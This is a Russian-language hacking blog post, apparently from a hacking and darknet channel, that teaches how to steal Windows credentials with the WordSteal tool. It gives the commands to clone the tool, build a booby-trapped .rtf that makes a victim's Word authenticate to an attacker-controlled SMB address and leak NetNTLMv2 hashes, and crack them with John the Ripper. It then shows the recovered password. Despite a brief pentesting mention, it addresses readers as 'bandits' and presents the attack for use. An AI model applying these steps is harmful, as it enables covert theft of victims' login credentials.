​​​Крадём учетные данные Windows с помощью MS Office Document | Interab

​​​Крадём учетные данные Windows с помощью MS Office Document

Айо, бандиты!Сегодня вы найдете в этой статье нечто невероятное, связанное с недавно запущенным скриптом под названием «WORD STEAL», который может все больше и больше определять ваши навыки взлома. Этот сценарий создаст POC, который украдет хэши NTLM с удаленного компьютера.

Microsoft Word может включать изображения из удаленных мест. Это недокументированная функция, но создатели вредоносных программ обнаружили, что она использовалась для добавления изображений через http для получения статистики. Мы также можем включить удаленные файлы на SMB-сервер, и жертва будет аутентифицироваться с использованием своих учетных данных. Это очень полезно во время пентеста, потому что позволяет украсть учетные данные, не вызывая никаких предупреждений, и большинство приложений безопасности не обнаруживают этого.

Во-первых, нам нужно скачать его с Github, открыть терминал в Kali Linux и ввести следующую команду.

git clone https://github.com/0x090x0/WordSteal.git

Теперь откройте загруженную папку word steal, где вы получите скрипт python «main.py» и предоставите все разрешения для скрипта main.py, если это необходимо.

chmod 777 main.py

Как описал автор, этот сценарий преобразует изображение или, скажем, .jpg в .rtf (файл Microsoft Word). Rich Text Format - это частный формат файла документа с опубликованной спецификацией, разработанный корпорацией Microsoft для межплатформенного обмена документами с продуктами Microsoft. .

После этого загрузите изображение и сохраните его в папке Wordsteal, поскольку в данный момент у меня есть изображение «1.jpg», нам необходимо ввести следующую команду, которая генерирует файл .rtf, который крадет хэши NTLM с удаленного компьютера.

python main.py 192.168.0.104 1.jpeg 1

Приведенная выше команда сгенерирует файл .rtf, как вы можете понять на данном снимке экрана после отправки файла 1.rtf на удаленный компьютер.

Когда жертва откроет 1.rtf (как файл Microsoft Word) в своей системе, с другой стороны, атака получит хэши NTLM.

Внутри Word Steal мы украли учетные данные, не запустив никаких предупреждений, которые вы можете наблюдать на следующем изображении. Теперь используйте инструмент для взлома паролей john the ripper, чтобы взломать хеши в файле password netntlmv2, или введите следующую команду:

John password_netntlmv2

Круто! Мы ясно видим учетные данные жертвы RAJ: 123, которые могут быть использованы для входа в систему.

Наш новый КАНАЛ о взломах и ДАРКНЕТЕ.